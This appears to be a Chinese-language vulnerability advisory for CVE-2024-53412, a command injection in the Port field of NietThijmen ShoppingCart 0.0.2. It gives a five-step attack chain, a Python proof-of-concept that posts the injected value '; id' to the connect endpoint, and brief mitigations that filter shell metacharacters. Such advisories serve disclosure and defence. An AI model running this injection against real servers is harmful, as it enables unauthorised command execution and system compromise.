CVE-2024-53412: NietThijmen ShoppingCart命令注入漏洞

漏洞信息

漏洞编号

CVE-2024-53412

漏洞类型

命令注入

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NietThijmen ShoppingCart

漏洞概述

NietThijmen ShoppingCart 0.0.2版本的connect函数中存在严重的命令注入安全漏洞。由于应用程序未对用户提交的Port字段参数进行充分的过滤和验证，攻击者无需经过身份认证即可注入恶意的操作系统命令。成功利用该漏洞可导致攻击者在底层服务器上执行任意代码，进而完全控制系统的机密性、完整性和可用性。该漏洞CVSS v3.1评分为8.4，属于高危严重级别。

技术细节

该漏洞的根源在于NietThijmen ShoppingCart软件在处理网络连接逻辑时存在不安全的直接命令执行。具体而言，connect函数接收用户输入的端口号（Port），并在未经过任何安全编码处理（如参数化查询或输入白名单验证）的情况下，直接将其拼接到系统Shell命令中执行。攻击者可以通过在Port字段中插入Shell元字符（如分号;、管道符|或反引号`），从而欺骗操作系统执行攻击者指定的任意指令。尽管CVSS向量显示攻击向量为本地（AV:L），但漏洞描述明确指出可实现远程代码执行（RCE），这意味着攻击者可以通过网络发送特制数据包触发漏洞。一旦利用成功，攻击者将获得与Web服务进程相同的系统权限，能够读取敏感文件、安装后门或破坏系统服务，对公网暴露的服务极具危险性。

攻击链分析

STEP 1

侦察

攻击者识别目标运行NietThijmen ShoppingCart 0.0.2，并定位到connect功能的API接口。

STEP 2

漏洞探测

攻击者向connect接口发送请求，并在Port字段中注入特定的探测字符（如分号或sleep命令），以验证命令注入是否存在。

STEP 3

载荷构造

确认漏洞后，攻击者构造包含恶意Shell命令的Payload，旨在获取系统权限、窃取数据或建立反弹Shell。

STEP 4

命令执行

服务器端connect函数处理该恶意请求，将Port参数直接传递给系统Shell执行，从而触发攻击者注入的代码。

STEP 5

后渗透

利用获取的Shell权限，攻击者进一步横向移动、安装持久化后门或窃取敏感数据库信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2024_53412(target_url):
    """
    Proof of Concept for CVE-2024-53412
    Exploits command injection in the Port field of NietThijmen ShoppingCart.
    """
    # The vulnerable endpoint (adjust based on actual application route)
    endpoint = f"{target_url}/connect"
    
    # Malicious payload to execute 'id' command via shell injection
    # Using a semicolon to chain commands
    payload = "; id"

    # Prepare data with the injected payload in the 'port' field
    data = {
        "host": "127.0.0.1",
        "port": payload
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=data, timeout=5)
        
        # Check if command execution output is visible in response
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:3000"
    exploit_cve_2024_53412(target)

影响范围

NietThijmen ShoppingCart 0.0.2

防御指南

临时缓解措施

建议立即在防火墙或WAF（Web应用防火墙）层面对connect接口实施访问控制，拦截包含Shell元字符（如;、|、&、`、$、()、<>）的请求流量。同时，检查系统日志中是否存在针对该端口的异常调用记录，并暂时禁用该功能直至修复完成。